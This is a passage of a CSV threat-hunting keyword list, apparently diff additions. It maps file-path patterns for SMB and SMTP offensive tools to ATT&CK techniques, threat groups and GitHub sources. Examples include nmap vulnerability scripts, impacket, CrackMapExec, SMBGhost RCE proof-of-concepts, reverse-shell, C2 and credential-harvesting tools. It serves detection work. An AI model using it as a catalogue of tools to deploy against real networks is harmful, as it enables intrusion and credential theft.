T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb2-vuln-uptime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb3.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/smb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-cmds.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/smb-double-pulsar-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*/smb-enum-domains.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-groups.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-services.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-sessions.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/smbexec.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/smb-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/SMBForwarder.txt*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/SMBGhost/scanner.py*","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","647","206","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z" +"*/SMBGhost_RCE*","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1264","355","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z" +"*/smbldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/smb-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smbmap.git*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*/smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/smb-mbenum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-os-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-print-text.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-protocols.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-psexec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-reverse-shell*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*/smb-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smbserver/smb_server.py*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*/smb-server-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-signing-disabled-hosts.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*/smbspider.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/smbsr.db*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z"
+"*/SMBSR.git*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - 
T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z"
+"*/smbsr.log*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z"
+"*/smb-system-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-vuln-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-vuln-cve2009-3103.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-vuln-cve-2017-7494.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-vuln-cve-2020-0796.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z"
+"*/smb-vuln-ms06-025.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-vuln-ms07-029.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-vuln-ms08-067.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-vuln-ms10-054.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-vuln-ms10-061.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-vuln-ms17-010.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-vuln-regsvc-dos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-vuln-webexec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smb-webexec-exploit.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/SMShell.git*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z"
+"*/SMShell/*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z"
+"*/smtp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smtp-commands.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smtp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smtp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smtp-open-relay.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smtp-strangeport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smtp-user-enum*","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smtp-vuln-cve2010-4344.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smtp-vuln-cve2011-1720.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smtp-vuln-cve2011-1764.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/smtp-vuln-cve2020-28017-through-28026-21nails.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z"
+"*/smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","1","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z"
